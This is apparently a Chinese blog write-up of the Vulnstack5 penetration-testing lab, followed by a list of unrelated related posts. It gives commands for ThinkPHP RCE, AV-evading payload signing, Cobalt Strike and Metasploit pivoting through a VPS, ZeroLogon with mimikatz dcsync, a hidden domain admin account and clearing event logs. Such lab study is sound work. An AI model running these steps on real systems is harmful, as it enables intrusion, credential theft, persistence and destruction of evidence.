红日靶场五(vulnstack5)渗透分析

环境搭建

复制代码
win7
192.168.111.132(仅主机)
192.168.123.212(桥接)
.\heart p-0p-0p-0

win2008 ip:
192.168.111.131(仅主机)
sun\admin 2020.com

kali ip:
192.168.10.131(nat)

vps:
101.42.**.**

用本地管理员heart登录并开启phpstudy

这里配置的原因是让kali可以访问win7,win7访问不了kali,模拟win7外网的环境和kali内网的环境

getshell

复制代码
sudo nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 512 --host-timeout 30 -T3 -v -oG result.txt --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0"  10.133.10.135 -p 0-65535

Discovered open port 110/tcp on 10.133.10.135

Discovered open port 139/tcp on 10.133.10.135

Discovered open port 3306/tcp on 10.133.10.135

Discovered open port 135/tcp on 10.133.10.135

Discovered open port 80/tcp on 10.133.10.135

Discovered open port 445/tcp on 10.133.10.135

Discovered open port 25/tcp on 10.133.10.135

Discovered open port 49152/tcp on 10.133.10.135

Discovered open port 49153/tcp on 10.133.10.135

Discovered open port 49154/tcp on 10.133.10.135

访问80页面发现一个thinkphp框架的首页,工具扫描RCE

复制代码
一键getshell
http://10.133.10.135/peiqi.php   Pass:peiqi

后渗透

将kali通过frp到vps端口,并生成免杀exe,蚁剑上传执行

复制代码
python 签名.py -i D:\Huorong\Sysdiag\bin\HipsMain.exe -t UUIDtoShell.exe -o qm.exe

上线cs,发现为heart用户,管理员权限,svc提权到system,抓取hash和明文,没有发现有用的域用户信息

复制代码
net view
ipconfig /all

发现主机dc:192.168.111.131 ,以及内网网卡192.168.111.132

开启socks代理,通过fscan扫描内网111网段

复制代码
proxychains4  ./fscan -h 192.168.111.0/24

192.168.111.131 MS17-010

192.168.111.131:445 open

192.168.111.131:135 open

192.168.111.131:139 open

192.168.111.131:88 open

存在永恒之蓝,将cs转到msf

复制代码
新建cs监听器,spawn msf/新建会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 127.0.0.1
set lport 4566
run

修改frp端口,增加4566为监听端口

复制代码
[cs->msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4566
remote_port = 4566

上线msf,开代理

复制代码
setg Proxies socks5:127.0.0.1:8899
setg ReverseAllowProxy true

MS17-010

复制代码
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.111.131
run

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.111.131
run

失败了

CVE-2020-1472-ZeroLogon

复制代码
mimikatz lsadump::zerologon /target:dc.sun.com /account:dc$
mimikatz lsadump::zerologon /target:dc.sun.com /account:dc$ /exploit
mimikatz lsadump::dcsync /domain:sun.com /dc:dc.sun.com /user:administrator /authuser:dc$ /authdomain:sun.com /authpassword:"" /authntlm
mimikatz lsadump::postzerologon /target:sun.com /account:dc$
#恢复密码,没有权限,可以先打到域控再复原

sun.com\Administrator 9099d68602a60f007c227c4fa95fada6
md5解密:p-0p-0p-0

这里dc不出网,fscan扫描到开启了445端口,直接smb上线

权限维持

复制代码
创建影子账户
net user coleak$ p-0p-0p-0 /add
net localgroup administrators coleak$ /add
net group "Domain Admins" coleak$ /add /domain
net users

痕迹清理

复制代码
wevtutil cl security	//清理安全日志
wevtutil cl system		//清理系统日志
wevtutil cl application		//清理应用程序日志
wevtutil cl "windows powershell"	//清除power shell日志
wevtutil cl Setup	
相关推荐
爬树的小蚂蚁2 小时前
Linux 修改bond后网关不生效的问题
linux·运维·服务器
lisw054 小时前
网络化:DevOps 工程的必要基础(Networking: The Essential Foundation for DevOps Engineering)
网络·devops
threelab4 小时前
07.three官方示例+编辑器+AI快速学习webgl_buffergeometry_attributes_integer
人工智能·学习·编辑器
半新半旧5 小时前
mongodb 学习笔记
笔记·学习·mongodb
风行無痕5 小时前
Ubuntu Linux系统配置账号无密码sudo
linux·服务器·ubuntu
驱动小百科6 小时前
WiFi出现感叹号上不了网怎么办 轻松恢复网络
网络·智能路由器·wifi出现感叹号怎么解决·wifi无法上网·电脑wifi
好多知识都想学6 小时前
协议路由与路由协议
网络·智能路由器
爆农6 小时前
centos搭建dokcer和vulhub
linux·运维·centos
SZ1701102316 小时前
中继器的作用
服务器·网络·智能路由器
重启就好7 小时前
【Ansible】模块详解
linux·服务器·ansible